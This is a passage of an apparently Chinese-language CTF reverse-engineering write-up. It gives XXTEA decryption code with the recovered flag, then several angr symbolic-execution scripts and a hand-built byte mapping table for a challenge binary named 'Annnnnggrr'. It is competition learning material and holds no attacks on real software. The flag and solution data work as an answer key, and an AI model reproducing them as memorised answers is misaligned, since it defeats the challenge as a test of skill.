0x82, 0x8A, 0xFA, 0x38, 0x80, 0x13, 0x50, 0xD7, 0x9D, 0x96,
0x40, 0x0E, 0x20, 0x91, 0x16, 0x4E, 0xAB, 0x29, 0x3A, 0x71,
0x3D, 0x39, 0xE5, 0x6C, 0x2E, 0x75, 0x9D, 0xB6, 0xE6, 0x88,
0x1A, 0x84, 0x59, 0xB4, 0x31, 0x6F};
uint32_t key[] ={0x19,0x19,0x8,0x10};
void btea(uint32_t *v, int n, uint32_t const key[4])
{
uint32_t y, z, sum;
unsigned p, rounds, e;
if (n > 1) /* Coding Part */
{
rounds = 6 + 52/n;
sum = 0;
z = v[n-1];
do
{
sum += DELTA;
e = (sum >> 2) & 3;
for (p=0; p<n-1; p++)
{
y = v[p+1];
z = v[p] += MX;
}
y = v[0];
z = v[n-1] += MX;
}
while (--rounds);
}
else if (n < -1) /* Decoding Part */
{
n = -n;
rounds = 6 + 52/n;
sum = rounds*DELTA;
y = v[0];
do
{
e = (sum >> 2) & 3;
for (p=n-1; p>0; p--)
{
z = v[p-1];
y = v[p] -= MX;
}
z = v[n-1];
y = v[0] -= MX;
sum -= DELTA;
}
while (--rounds);
}
}
int main() {
uint32_t *p = (uint32_t *)ida_chars; // 这里自动实现了小端序的转换
for (int i=0;i<9;i++)
{
printf("%0x,",p[i]);
}
btea(p, -9, key);
for(int i = 0; i < 36; i +=1 ) {
printf("%c", ida_chars[i]);
}
}
flag{H0P3_U_L1k3_Th15_CUP_0f_TEa.}
Annnnnggrr
0x01 angr 思路分析
结合题目,考点应该是 angr 的使用。
(173条消息) CTF 逆向工具angr的学习笔记___lifanxin的博客-CSDN博客_ctf逆向工具
【angr_ctf】二进制分析工具angr使用与练习-Part I(基础篇) - 求索 (gentlecp.com)
#encoding=utf-8
import angr
# 方式1,通过期望地址 和 避免地址 进行 angr 符号处理
proj = angr.Project(r"./Annnnnggrr",auto_load_libs=False) #载入程序
state = proj.factory.entry_state() #找入口点
simgr = proj.factory.simgr(state) #从入口点开始爆破
simgr.explore(find=0x140002498,avoid=0x140002491) #期望路径 和 避免的路径
print (simgr.found[0].posix.dump(0)) #打印正确输入
# 该脚本无法跑出,应该是下面所示的,通过使用cmova,0x140002491、0x140002498两个地址都有使用到,所以导致上述脚本无用
.text:0000000140002484 88 05 C1 31 00 00 mov cs:byte_14000564B, al
.text:000000014000248A E8 93 0C 00 00 call memcmp
.text:000000014000248A
.text:000000014000248F 85 C0 test eax, eax
.text:0000000140002491 48 8D 15 F8 1D 00 00 lea rdx, aFailed ; "Failed."
.text:0000000140002498 48 8D 0D E1 1D 00 00 lea rcx, aSuccess ; "Success!"
.text:000000014000249F 48 0F 45 CA cmovnz rcx, rdx ; Format
.text:00000001400024A3 E8 78 EB FF FF call sub_140001020
# cmp %rsi, %rdi
# cmova %rdx, %rax
如果RDI寄存器中的值大于RSI寄存器中的值,则把RAX寄存器中的值替换为RDX寄存器中的值。
# 方式二
# 通过输出值进行期望设置,来符号运算 但是,速度太慢,能否跑出来不知道【尝试跑了30分钟左右,放弃】
import angr
pro = angr.Project(r"F:\CTF_\CTF练习\2022_ctf\NewStarCTF 公开赛\Week3\Re\Annnnnggrr\Annnnnggrr.exe",auto_load_libs=False)
init_state = pro.factory.entry_state()
simu = pro.factory.simgr(init_state)
def success(state):
output = state.posix.dumps(1) # get output from stdout
return b"Success!" in output
def abort(state):
output = state.posix.dumps(1) # get output from stdout
return b"Failed." in output
simu.explore(find=success, avoid=abort)
if simu.found:
res = simu.found[0]
for i in range(3):
print(res.posix.dumps(i))
else:
print("No result!")
#encoding=utf-8
import angr
import claripy
# 方式三,设置寄存器 eax, 但也没有用。原因未知,
p = angr.Project(r"F:\CTF_\CTF练习\2022_ctf\NewStarCTF 公开赛\Week3\Re\Annnnnggrr\Annnnnggrr.exe",auto_load_libs=False)
init_addr = 0x140001103 # scanf的下一条指令地址
state = p.factory.blank_state(addr=init_addr) # 创建一个状态,并将该地址赋给它,也就是跳过输入,直接执行下一条指令,此处使用.blank_state()而不再是.entry_state()
# 定义1个位向量,即1个输入
p1 = claripy.BVS('p1', 64*4) # 32位寄存器(符号向量)
# p2 = claripy.BVS('p2', 32)
# p3 = claripy.BVS('p3', 32)
state.regs.eax = p1 # .regs.eax 访问eax这个寄存器
# state.regs.ebx = p2
# state.regs.edx = p3
sm = p.factory.simulation_manager(state)
def good(state):
return b'Success!' in state.posix.dumps(1)
def bad(state):
return b'Failed.' in state.posix.dumps(1)
sm.explore(find=good, avoid=bad)
if sm.found:
find_state = sm.found[0]
flag1 = find_state.solver.eval(p1) # 将探索成功时的第一个输入赋给flag1,下面两个类似
# flag2 = find_state.solver.eval(p2)
# flag3 = find_state.solver.eval(p3)
# print('{:x} {:x} {:x}'.format(flag1, flag2, flag3))
print('{:x}'.format(flag1))
测试了好多,都没有用。但是题目显然就是考这个angr 符号求解,只能等Wp 看如何使用。
那还有其他解决方案吗?
0x02 其他解决方案
z3 or 爆破解决:
# z3发现解不出来,直接麻了!!!
# 后面尝试,直接爆破没居然无解
【整理数据花了很久,但没出结果,直接哭。这里原因未知,可能数据整理时有误,也可能其他】
【尝试爆破也无解,难道数据之间有相互运算,我没注意到???】
只能尝试最后一种方案了:利用程序,获取flag。【分析程序可以知道,各个位置上的,输入与输出有一一对应关系,依据线性关系,获取每个字符,每个位置对应的输出,ida 手动patch 出一一对应关系 的数据,然后根据密文映射出flag】
显然,这种方式很费时间【当然,如果能写交互脚本,patch data,又会简单很多】
下面是手动patch 出的映射关系表【不会写脚本,就勤能补拙吧】
# -*- coding: UTF-8 -*-
test = '!#$*+-0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz{}~\'&'
enc = [0x4F, 0x17, 0x0C, 0x56, 0xDB, 0x67, 0x5D, 0x67, 0x32, 0x2B,
0x36, 0x03, 0x02, 0xF3, 0xA1, 0xE4, 0xC7, 0x27, 0xC1, 0xB6,
0x4C, 0xD7, 0x59, 0xA1, 0x71, 0x52, 0x9A, 0xE2, 0x21, 0x96,
0x0C, 0xCA]
test_ = [[0xEE, 0x62, 0xCC, 0x20, 0xE9, 0x5B, 0x39, 0x0B, 0x0C, 0x93,
0xF0, 0x21, 0xC2, 0x04, 0x2F, 0x27, 0x8D, 0xBD, 0x81, 0x81,
0x9A, 0xE1, 0x09, 0x56, 0x33, 0x5D, 0x9F, 0x5C, 0x61, 0x17,
0xC5, 0x9E],
[0x60, 0x4C, 0xF2, 0x02, 0xA3, 0x19, 0xC7, 0xF9, 0xFE, 0x15,
0xF2, 0x23, 0x64, 0x7A, 0x25, 0x79, 0x43, 0x67, 0x37, 0xDB,
0x8C, 0x5B, 0x7B, 0xA8, 0x9D, 0x47, 0xFD, 0xDE, 0xD3, 0x5D,
0xF7, 0x7C],
[0xB5, 0x1F, 0xC7, 0x17, 0xE4, 0xFA, 0xD8, 0xB8, 0x45, 0x72,
0xBB, 0x24, 0x75, 0x8D, 0xDC, 0x54, 0xD8, 0x3A, 0x62, 0x2E,
0x21, 0x78, 0x84, 0x51, 0xBC, 0x26, 0xEA, 0x6D, 0xD8, 0xAE,
0xD4, 0x27],
[0x33, 0xCD, 0x59, 0x55, 0x4A, 0x04, 0x5A, 0x4A, 0x8B, 0xF0,
0x69, 0x2A, 0x8B, 0x97, 0xD6, 0x4A, 0x2A, 0xC0, 0x0C, 0x74,
0x17, 0x96, 0x3A, 0xA7, 0xB2, 0xFC, 0x6C, 0xD3, 0xC6, 0x08,
0xFA, 0x51],
[0xA8, 0xC4, 0xCA, 0xFA, 0x2B, 0x11, 0x9F, 0x51, 0x96, 0xED,
0xBA, 0x2B, 0x5C, 0xC2, 0x1D, 0x31, 0xAB, 0xDF, 0x5F, 0x63,
0x64, 0xF3, 0x23, 0x30, 0xD5, 0xBF, 0x55, 0xA6, 0x4B, 0xE5,
0x0F, 0x94],
[0xCA, 0x96, 0x80, 0x8C, 0x25, 0xCF, 0x1D, 0x27, 0xE0, 0x8F,
0x54, 0x2D, 0x5E, 0xA8, 0xB3, 0xBB, 0x91, 0x89, 0x15, 0x1D,
0xD6, 0xFD, 0x35, 0xE2, 0x57, 0xE9, 0x5B, 0x10, 0x65, 0xE3,
0xD9, 0x7A],
[0xD1, 0xF3, 0x6B, 0x63, 0x50, 0x0E, 0xAC, 0x44, 0x59, 0xFE,
0xDF, 0x30, 0x61, 0xE1, 0xD0, 0x68, 0x4C, 0x16, 0xF6, 0xEA,
0x7D, 0x24, 0x10, 0x3D, 0xF0, 0x42, 0xB6, 0x61, 0xFC, 0x7A,
0xE8, 0x03],
[0xFE, 0xB2, 0xBC, 0xB0, 0x99, 0xAB, 0x89, 0x3B, 0xBC, 0x43,
0x00, 0x31, 0x32, 0xF4, 0x9F, 0xB7, 0xDD, 0x2D, 0xD1, 0x31,
0x2A, 0xF1, 0x59, 0xE6, 0xC3, 0x2D, 0x4F, 0x6C, 0x31, 0xC7,
0x95, 0xEE], # 1
[0xDB, 0x05, 0x91, 0x8D, 0x52, 0x5C, 0x32, 0x82, 0x63, 0x28,
0x31, 0x32, 0xE3, 0x1F, 0x4E, 0x22, 0xB2, 0x18, 0x54, 0x3C,
0x8F, 0xEE, 0x42, 0xEF, 0x4A, 0x74, 0x04, 0xDB, 0x5E, 0xD0,
0x12, 0xA9], # 2
[0x30, 0xDC, 0x62, 0xD2, 0x13, 0x29, 0x57, 0x69, 0xAE, 0x85,
0x02, 0x33, 0xD4, 0xEA, 0x15, 0x09, 0x93, 0x17, 0x47, 0x0B,
0x9C, 0x2B, 0x4B, 0x78, 0xAD, 0x17, 0xAD, 0xAE, 0x23, 0x4D,
0xC7, 0xCC],
[0x45, 0x6F, 0x77, 0x27, 0xD4, 0xCA, 0x28, 0x68, 0xB5, 0xE2,
0xCB, 0x34, 0x25, 0x7D, 0x4C, 0xA4, 0xA8, 0xAA, 0xB2, 0xDE,
0x71, 0x88, 0x14, 0xE1, 0x0C, 0x76, 0x5A, 0x3D, 0x68, 0x5E,
0xE4, 0xB7],
[0xD2, 0x8E, 0xF8, 0xA4, 0x8D, 0x27, 0xF5, 0x1F, 0x58, 0x07,
0xDC, 0x35, 0xD6, 0x90, 0x8B, 0x93, 0x59, 0x41, 0x5D, 0xC5,
0xAE, 0x15, 0xDD, 0x2A, 0x8F, 0x41, 0x53, 0x18, 0x7D, 0x0B,
0x51, 0xF2],
[0x1F, 0x11, 0xAD, 0xD1, 0x46, 0x28, 0xDE, 0x56, 0x2F, 0x7C,
0x0D, 0x36, 0x37, 0x3B, 0xCA, 0x1E, 0xFE, 0xDC, 0x40, 0xF0,
0xA3, 0x02, 0x36, 0xE3, 0x76, 0x28, 0xA8, 0x57, 0xDA, 0x24,
0xAE, 0x2D],
[0x04, 0x88, 0xAE, 0x26, 0x37, 0x85, 0xF3, 0x3D, 0x9A, 0x99,
0x0E, 0x37, 0xD8, 0x26, 0x91, 0x15, 0xDF, 0x0B, 0xB3, 0x3F,
0x20, 0xFF, 0x1F, 0x4C, 0xB9, 0x3B, 0x41, 0x7A, 0x0F, 0x61,
0x83, 0x50],
[0xD9, 0x2B, 0xE3, 0x9B, 0x18, 0x06, 0x44, 0xBC, 0x51, 0xD6,
0xC7, 0x38, 0x39, 0x09, 0xE8, 0xC0, 0xB4, 0x2E, 0x9E, 0x92,
0x15, 0xFC, 0x38, 0x45, 0xA8, 0x5A, 0xAE, 0xA9, 0xF4, 0xA2,
0x00, 0xFB],
[0xA6, 0x6A, 0xF4, 0x08, 0xE1, 0x83, 0xA1, 0xB3, 0x14, 0xFB,
0x08, 0x39, 0x4A, 0x3C, 0x57, 0xEF, 0xA5, 0x25, 0x79, 0xD9,
0x62, 0x69, 0x01, 0x8E, 0x7B, 0x45, 0x67, 0xD4, 0x69, 0xCF,
0x8D, 0xA6], # 9
[0xE1, 0x43, 0x9B, 0xF3, 0x80, 0xDE, 0x3C, 0x74, 0x09, 0x2E,
0xEF, 0x40, 0xD1, 0x11, 0x40, 0x78, 0x5C, 0xC6, 0xC6, 0x5A,
0x0D, 0xB4, 0x60, 0x0D, 0x00, 0x52, 0xE6, 0xF1, 0x0C, 0x2A,
0xB8, 0x93], # @
[0xCE, 0x82, 0x6C, 0x40, 0x09, 0xBB, 0x99, 0x6B, 0xEC, 0x73,
0x50, 0x41, 0xA2, 0xE4, 0x8F, 0xC7, 0xED, 0xDD, 0xE1, 0x61,
0x3A, 0x41, 0x69, 0x36, 0x53, 0xFD, 0xBF, 0xBC, 0xC1, 0xF7,
0xE5, 0xFE], # A
[0xEB, 0x15, 0x01, 0xDD, 0x02, 0xAC, 0x42, 0x32, 0x93, 0x58,
0xC1, 0x42, 0x13, 0x0F, 0x3E, 0xF2, 0x82, 0x88, 0x64, 0xEC,
0xDF, 0x7E, 0x52, 0x7F, 0x1A, 0x44, 0x34, 0x2B, 0x2E, 0x40,
0xA2, 0xB9],
[0xC0, 0xEC, 0x92, 0x22, 0xC3, 0x79, 0xA7, 0x59, 0xDE, 0xF5,
0xD2, 0x43, 0x44, 0xDA, 0x05, 0x19, 0xA3, 0x07, 0x17, 0x3B,
0x2C, 0x3B, 0xDB, 0x88, 0x3D, 0x67, 0x1D, 0xBE, 0xB3, 0x3D,
0x17, 0x5C],
[0x95, 0x3F, 0xE7, 0x37, 0x04, 0xDA, 0x38, 0x18, 0x25, 0x52,
0x1B, 0x44, 0x55, 0xED, 0x3C, 0xF4, 0xB8, 0x5A, 0xC2, 0x0E,
0xC1, 0x58, 0xE4, 0x31, 0xDC, 0x46, 0x8A, 0xCD, 0xB8, 0x8E,
0x74, 0x87],
[0xE2, 0x1E, 0x28, 0xF4, 0x3D, 0x77, 0x85, 0x8F, 0x88, 0xB7,
0x2C, 0x45, 0x86, 0x80, 0x7B, 0x63, 0xA9, 0xB1, 0xAD, 0xF5,
0x3E, 0x25, 0x6D, 0xFA, 0x9F, 0x51, 0x43, 0x28, 0xCD, 0x3B,
0x61, 0x82],
[0x6F, 0xA1, 0xDD, 0x21, 0xB6, 0xB8, 0xAE, 0xC6, 0xDF, 0xAC,
0x9D, 0x46, 0xE7, 0xEB, 0x7A, 0xEE, 0x4E, 0x4C, 0xD0, 0xA0,
0xF3, 0x92, 0x06, 0x33, 0x06, 0x78, 0x18, 0xE7, 0xEA, 0x94,
0xFE, 0xFD],
[0x94, 0xD8, 0x1E, 0x36, 0x67, 0x55, 0x03, 0xAD, 0x8A, 0xC9,
0x5E, 0x47, 0x08, 0xD6, 0x81, 0x25, 0xAF, 0xFB, 0x03, 0xEF,
0xF0, 0x0F, 0xEF, 0x1C, 0x89, 0x8B, 0x31, 0x8A, 0x1F, 0x11,
0x13, 0xE0],
[0x29, 0x3B, 0xD3, 0xEB, 0x08, 0xD6, 0x14, 0x6C, 0xC1, 0xC6,
0x57, 0x48, 0xA9, 0xB9, 0x18, 0xD0, 0xC4, 0xDE, 0x6E, 0x42,
0xA5, 0x4C, 0x08, 0x95, 0x38, 0x2A, 0x5E, 0xB9, 0x44, 0x92,
0x50, 0xCB],
[0xF6, 0x7A, 0x64, 0x98, 0x91, 0x53, 0x31, 0x23, 0x04, 0x2B,
0x18, 0x49, 0xFA, 0xAC, 0x87, 0x3F, 0xF5, 0x55, 0xC9, 0x49,
0x72, 0x79, 0xD1, 0x1E, 0x0B, 0x95, 0x97, 0xE4, 0xB9, 0x7F,
0xDD, 0x76], # I
[0x13, 0xED, 0x79, 0x75, 0xEA, 0xE4, 0x3A, 0x2A, 0x6B, 0xD0,
0x49, 0x4A, 0xEB, 0x77, 0xB6, 0x6A, 0x0A, 0x60, 0xEC, 0xD4,
0xB7, 0x76, 0x1A, 0x87, 0x52, 0x9C, 0x8C, 0x33, 0xA6, 0x68,
0x9A, 0x31],
[0x88, 0xE4, 0xEA, 0x9A, 0x4B, 0x71, 0xFF, 0x31, 0xF6, 0x4D,
0x9A, 0x4B, 0x3C, 0xA2, 0xFD, 0xD1, 0x8B, 0xFF, 0xBF, 0x43,
0x04, 0xD3, 0x83, 0x10, 0xF5, 0x5F, 0x75, 0x86, 0xAB, 0xC5,
0xAF, 0xF4],
[0x1D, 0xF7, 0x3F, 0x4F, 0x8C, 0xF2, 0xD0, 0x50, 0x7D, 0x2A,
0x83, 0x4C, 0xAD, 0x15, 0xF4, 0xAC, 0xC0, 0x32, 0x0A, 0x56,
0x19, 0xF0, 0x0C, 0xB9, 0x74, 0x9E, 0xC2, 0xF5, 0xF0, 0x36,
0x6C, 0x5F],
[0x2A, 0xB6, 0xA0, 0xAC, 0x45, 0x2F, 0xFD, 0x87, 0x40, 0xEF,
0xB4, 0x4D, 0xBE, 0x08, 0x93, 0x5B, 0xF1, 0x29, 0xF5, 0xFD,
0xF6, 0xDD, 0x15, 0xC2, 0x77, 0x09, 0xFB, 0xF0, 0x45, 0x43,
0xF9, 0x5A], # M
[0xD7, 0x19, 0x15, 0x39, 0x1E, 0x30, 0xA6, 0xDE, 0x17, 0x84,
0xA5, 0x4E, 0x3F, 0x13, 0x12, 0x86, 0xD6, 0x84, 0x98, 0x28,
0x6B, 0xEA, 0xEE, 0x9B, 0x7E, 0x70, 0xD0, 0xEF, 0x02, 0x1C,
0xD6, 0x35],
[0x7C, 0x50, 0x76, 0xCE, 0xCF, 0xAD, 0x7B, 0x45, 0x42, 0x61,
0x66, 0x4F, 0x80, 0xBE, 0xD9, 0xBD, 0x37, 0xB3, 0x2B, 0xD7,
0xC8, 0x87, 0xB7, 0xE4, 0x61, 0x03, 0x69, 0x52, 0x97, 0xF9,
0x4B, 0xF8],
[0x31, 0x13, 0x8B, 0x03, 0xF0, 0xEE, 0x8C, 0x24, 0xB9, 0xDE,
0xBF, 0x50, 0xC1, 0x41, 0x30, 0x08, 0x2C, 0xB6, 0x56, 0xCA,
0x9D, 0x04, 0xF0, 0x9D, 0x10, 0x62, 0xD6, 0x41, 0x5C, 0x5A,
0x08, 0x63],
[0x5E, 0x52, 0xDC, 0x50, 0xB9, 0x0B, 0x69, 0x1B, 0x9C, 0x23,
0xE0, 0x51, 0x12, 0xD4, 0xFF, 0xD7, 0x3D, 0x4D, 0xB1, 0x11,
0x4A, 0xD1, 0xB9, 0x46, 0x63, 0xCD, 0x6F, 0x4C, 0x91, 0x27,
0x35, 0x4E],
[0x3B, 0xA5, 0x31, 0xAD, 0x72, 0xBC, 0x12, 0x62, 0xC3, 0x88,
0x11, 0x52, 0x43, 0xFF, 0x2E, 0xC2, 0x92, 0xB8, 0x34, 0x1C,
0xAF, 0x4E, 0xA2, 0x4F, 0x6A, 0x94, 0x24, 0x3B, 0x3E, 0xB0,
0xB2, 0x09],
[0x10, 0xFC, 0x82, 0xF2, 0x33, 0x89, 0x37, 0xC9, 0x8E, 0x65,
0x62, 0x53, 0x34, 0xCA, 0xF5, 0xA9, 0x73, 0x37, 0xA7, 0xEB,
0x3C, 0x8B, 0xAB, 0x58, 0x4D, 0xB7, 0x4D, 0x8E, 0x83, 0xAD,
0x67, 0x2C],
[0x25, 0x8F, 0x17, 0xC7, 0xF4, 0xAA, 0x08, 0x48, 0x95, 0xC2,
0xAB, 0x54, 0x85, 0xDD, 0x2C, 0xC4, 0x08, 0xCA, 0x92, 0x3E,
0x11, 0x68, 0xF4, 0x41, 0x2C, 0x16, 0x7A, 0x9D, 0x48, 0xBE,
0x04, 0x97],
[0xB2, 0x2E, 0x18, 0x44, 0xAD, 0x87, 0x55, 0xFF, 0xB8, 0x67,
0x3C, 0x55, 0x36, 0x70, 0x6B, 0xB3, 0x39, 0x61, 0x3D, 0xA5,
0xCE, 0x75, 0xBD, 0x8A, 0xAF, 0x61, 0xF3, 0xF8, 0x5D, 0xEB,
0x71, 0xD2],
[0x7F, 0xB1, 0x4D, 0xF1, 0xE6, 0x88, 0x3E, 0xB6, 0x0F, 0xDC,
0xED, 0x56, 0x97, 0x1B, 0xAA, 0x3E, 0xDE, 0x7C, 0xA0, 0x50,
0x43, 0x62, 0x96, 0xC3, 0x16, 0x48, 0x48, 0xB7, 0xBA, 0x04,
0xCE, 0x8D],
[0x64, 0x28, 0x4E, 0xC6, 0xD7, 0x65, 0xD3, 0x9D, 0xFA, 0x79,
0xEE, 0x57, 0x38, 0x86, 0xF1, 0x35, 0x3F, 0xAB, 0x13, 0x1F,
0xC0, 0xDF, 0xFF, 0x2C, 0x59, 0xDB, 0xE1, 0xDA, 0xEF, 0x41,
0xA3, 0xB0],
[0x39, 0xCB, 0x03, 0x3B, 0x38, 0x66, 0x24, 0x9C, 0xB1, 0xB6,
0xA7, 0x58, 0x99, 0x69, 0x48, 0xE0, 0x94, 0x4E, 0xFE, 0xF2,
0xB5, 0x5C, 0x98, 0xA5, 0xC8, 0xFA, 0x4E, 0x89, 0xD4, 0x82,
0xA0, 0xDB],
[0x86, 0x0A, 0x94, 0x28, 0x01, 0xE3, 0x81, 0x93, 0x74, 0x5B,
0xE8, 0x59, 0x2A, 0x1C, 0x37, 0x8F, 0x05, 0x45, 0x59, 0xB9,
0x02, 0xC9, 0x61, 0xEE, 0x1B, 0xE5, 0x07, 0x34, 0xC9, 0xAF,
0x2D, 0x06],
[0x63, 0xBD, 0x69, 0x05, 0x1A, 0x74, 0xCA, 0xDA, 0x1B, 0x00,
0x99, 0x5A, 0x9B, 0xA7, 0xE6, 0xBA, 0x5A, 0xD0, 0xFC, 0x44,
0xC7, 0x46, 0xEA, 0x97, 0x22, 0xAC, 0x7C, 0x03, 0xF6, 0x98,
0x6A, 0x01], # Z
[0x8C, 0xE0, 0x26, 0xDE, 0xFF, 0xFD, 0x8B, 0x35, 0x32, 0x11,
0x36, 0x5F, 0x30, 0xEE, 0xC9, 0x4D, 0xC7, 0xE3, 0x7B, 0x87,
0x18, 0xD7, 0xC7, 0xF4, 0x71, 0x53, 0x19, 0xE2, 0xE7, 0x69,
0x9B, 0xC8],
[0xAE, 0xA2, 0x0C, 0xE0, 0xA9, 0x9B, 0x79, 0x4B, 0xCC, 0x53,
0xB0, 0x61, 0x02, 0x44, 0x6F, 0x67, 0xCD, 0x7D, 0xC1, 0x41,
0x5A, 0xA1, 0x49, 0x16, 0xF3, 0x1D, 0xDF, 0x9C, 0x21, 0xD7,
0x05, 0xDE], # a
[0xCB, 0xB5, 0xA1, 0xFD, 0xA2, 0x0C, 0x22, 0x92, 0xF3, 0xB8,
0xA1, 0x62, 0xF3, 0xEF, 0x9E, 0x92, 0xE2, 0xA8, 0xC4, 0x4C,
0x7F, 0xDE, 0xB2, 0x5F, 0xBA, 0x64, 0x54, 0x8B, 0x8E, 0xA0,
0x42, 0x99],
[0x20, 0x8C, 0x32, 0xC2, 0x63, 0x59, 0x07, 0x39, 0xBE, 0xD5,
0xB2, 0x63, 0xA4, 0xBA, 0x65, 0xB9, 0x83, 0x27, 0x77, 0x9B,
0x4C, 0x1B, 0xBB, 0x68, 0x5D, 0x07, 0x3D, 0x1E, 0x93, 0x1D,
0x37, 0xBC],
[0x75, 0x5F, 0x07, 0xD7, 0xA4, 0x3A, 0x18, 0xF8, 0x05, 0x32,
0x7B, 0x64, 0xB5, 0xCD, 0x1C, 0x94, 0x18, 0xFA, 0xA2, 0xEE,
0xE1, 0x38, 0xC4, 0x11, 0x7C, 0xE6, 0x2A, 0xAD, 0x98, 0x6E,
0x14, 0x67],
[0xC2, 0xBE, 0x48, 0x94, 0xDD, 0xD7, 0xE5, 0x6F, 0xE8, 0x97,
0x0C, 0x65, 0xE6, 0xE0, 0xDB, 0x83, 0x09, 0x51, 0x8D, 0x55,
0x5E, 0x05, 0xCD, 0x5A, 0xBF, 0x71, 0xE3, 0x08, 0x2D, 0x9B,
0x01, 0xE2],
[0x4F, 0x41, 0x7D, 0xC1, 0xD6, 0x98, 0x0E, 0xA6, 0xBF, 0x0C,
0x7D, 0x66, 0xC7, 0xCB, 0xDA, 0x8E, 0x2E, 0xEC, 0x30, 0x80,
0x93, 0xF2, 0xE6, 0x13, 0xA6, 0x18, 0xB8, 0xC7, 0x4A, 0x74,
0x9E, 0xDD],
[0xF4, 0xF8, 0x3E, 0x56, 0x87, 0x35, 0x63, 0x0D, 0xEA, 0xA9,
0x3E, 0x67, 0xE8, 0xB6, 0xE1, 0x45, 0x0F, 0x9B, 0xE3, 0xCF,
0x90, 0xEF, 0xCF, 0x7C, 0x29, 0xAB, 0x51, 0xEA, 0xFF, 0x71,
0xB3, 0x40],
[0x89, 0xDB, 0x73, 0x0B, 0x28, 0x36, 0x74, 0xCC, 0x21, 0xA6,
0xB7, 0x68, 0x09, 0x19, 0xF8, 0x70, 0xA4, 0xFE, 0xCE, 0x22,
0x45, 0x2C, 0x68, 0xF5, 0x58, 0xCA, 0xFE, 0x99, 0xA4, 0xF2,
0xF0, 0x2B],
[0x56, 0x9A, 0x04, 0xB8, 0x31, 0x33, 0x11, 0x03, 0xE4, 0x8B,
0x78, 0x69, 0xDA, 0x0C, 0x67, 0xDF, 0x55, 0x75, 0xA9, 0xA9,
0x12, 0xD9, 0x31, 0xFE, 0xAB, 0xB5, 0x37, 0xC4, 0x99, 0x5F,
0xFD, 0x56],
[0xF3, 0x0D, 0x99, 0x15, 0x0A, 0x44, 0x9A, 0x8A, 0x4B, 0xB0,
0x29, 0x6A, 0xCB, 0xD7, 0x16, 0x8A, 0x6A, 0x80, 0x4C, 0x34,
0xD7, 0x56, 0x7A, 0x67, 0x72, 0xBC, 0xAC, 0x13, 0x86, 0xC8,
0x3A, 0x91],
[0xF3, 0x0D, 0x99, 0x15, 0x0A, 0x44, 0x9A, 0x8A, 0x4B, 0xB0,
0x29, 0x6A, 0xCB, 0xD7, 0x16, 0x8A, 0x6A, 0x80, 0x4C, 0x34,
0xD7, 0x56, 0x7A, 0x67, 0x72, 0xBC, 0xAC, 0x13, 0x86, 0xC8,
0x3A, 0x91],
[0x7D, 0x17, 0x5F, 0xEF, 0xAC, 0xD2, 0xB0, 0x30, 0xDD, 0x0A,
0xE3, 0x6C, 0x0D, 0x75, 0xD4, 0xCC, 0xA0, 0x52, 0xEA, 0xB6,
0xB9, 0xD0, 0x6C, 0x99, 0x14, 0x3E, 0x62, 0xD5, 0x50, 0x96,
0x0C, 0xBF],
[0x8A, 0xD6, 0xC0, 0x4C, 0xE5, 0x0F, 0x5D, 0x67, 0xA0, 0x4F,
0x14, 0x6D, 0x9E, 0xE8, 0xF3, 0xFB, 0xD1, 0x49, 0x55, 0xDD,
0x96, 0xBD, 0x75, 0xA2, 0x17, 0xA9, 0x9B, 0x50, 0x25, 0xA3,
0x19, 0xBA],
[0x37, 0xB9, 0xB5, 0xD9, 0xBE, 0x90, 0x06, 0x3E, 0x77, 0xE4,
0x85, 0x6E, 0x9F, 0xF3, 0xF2, 0xA6, 0x36, 0x24, 0xF8, 0x88,
0x0B, 0x4A, 0xCE, 0x7B, 0x9E, 0x10, 0x70, 0x4F, 0xE2, 0xFC,
0xF6, 0x15],
[0xDC, 0x70, 0x96, 0x6E, 0xEF, 0x8D, 0xDB, 0x25, 0x22, 0x41,
0xC6, 0x6F, 0xE0, 0x1E, 0xB9, 0xDD, 0x97, 0x53, 0x0B, 0xB7,
0xE8, 0xE7, 0x97, 0xC4, 0x01, 0x23, 0x09, 0x32, 0x77, 0x59,
0x6B, 0x58],
[0x91, 0x33, 0xAB, 0x23, 0x10, 0x4E, 0xEC, 0x84, 0x19, 0xBE,
0x9F, 0x70, 0xA1, 0x21, 0x10, 0xA8, 0x8C, 0xD6, 0x36, 0xAA,
0x3D, 0xE4, 0x50, 0xFD, 0xB0, 0x02, 0xF6, 0xA1, 0xBC, 0x3A,
0x28, 0x43],
[0xBE, 0xF2, 0xFC, 0x70, 0x59, 0xEB, 0xC9, 0x7B, 0x7C, 0x03,
0xC0, 0x71, 0x72, 0x34, 0xDF, 0xF7, 0x1D, 0xED, 0x11, 0xF1,
0xEA, 0xB1, 0x99, 0xA6, 0x83, 0xED, 0x8F, 0xAC, 0xF1, 0x87,
0xD5, 0x2E],
[0x9B, 0x45, 0xD1, 0x4D, 0x12, 0x9C, 0x72, 0xC2, 0x23, 0xE8,
0xF1, 0x72, 0x23, 0x5F, 0x8E, 0x62, 0xF2, 0xD8, 0x94, 0xFC,
0x4F, 0xAE, 0x82, 0xAF, 0x0A, 0x34, 0x44, 0x1B, 0x1E, 0x90,
0x52, 0xE9],
[0xF0, 0x1C, 0xA2, 0x92, 0xD3, 0x69, 0x97, 0xA9, 0x6E, 0x45,
0xC2, 0x73, 0x14, 0x2A, 0x55, 0x49, 0xD3, 0xD7, 0x87, 0xCB,
0x5C, 0xEB, 0x8B, 0x38, 0x6D, 0xD7, 0xED, 0xEE, 0xE3, 0x0D,
0x07, 0x0C],
[0x05, 0xAF, 0xB7, 0xE7, 0x94, 0x0A, 0x68, 0xA8, 0x75, 0xA2,
0x8B, 0x74, 0x65, 0xBD, 0x8C, 0xE4, 0xE8, 0x6A, 0xF2, 0x9E,
0x31, 0x48, 0x54, 0xA1, 0xCC, 0x36, 0x9A, 0x7D, 0x28, 0x1E,
0x24, 0xF7],
[0x92, 0xCE, 0x38, 0x64, 0x4D, 0x67, 0x35, 0x5F, 0x18, 0xC7,
0x9C, 0x75, 0x16, 0xD0, 0xCB, 0xD3, 0x99, 0x01, 0x9D, 0x85,
0x6E, 0xD5, 0x1D, 0xEA, 0x4F, 0x01, 0x93, 0x58, 0x3D, 0xCB,
0x91, 0x32],
[0xDF, 0x51, 0xED, 0x91, 0x06, 0x68, 0x1E, 0x96, 0xEF, 0x3C,
0xCD, 0x76, 0x77, 0x7B, 0x0A, 0x5E, 0x3E, 0x9C, 0x80, 0xB0,
0x63, 0xC2, 0x76, 0xA3, 0x36, 0xE8, 0xE8, 0x97, 0x9A, 0xE4,
0xEE, 0x6D],
